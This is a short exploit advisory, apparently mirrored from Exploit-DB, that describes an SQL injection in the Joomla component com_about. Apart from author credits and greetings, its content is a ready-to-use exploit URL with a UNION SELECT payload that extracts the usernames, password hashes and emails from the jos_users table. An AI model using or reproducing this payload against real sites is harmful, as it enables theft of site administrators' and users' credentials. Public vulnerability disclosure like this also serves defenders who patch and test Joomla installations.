Joomla! Component com_about – SQL Injection - 体验盒子

作者： snakespc

日期： 2010-03-11

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11684/

==============================================================================
[»] Joomla com_about Remote Sql Injection Vulnerability
==============================================================================
 
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder:[ Snakespc Email:s-c-dz@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
 
###########################################################################
 ===[ Exploit ]===
 
[»] http://server/index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users--
[»]Author: Snakespc <-
###########################################################################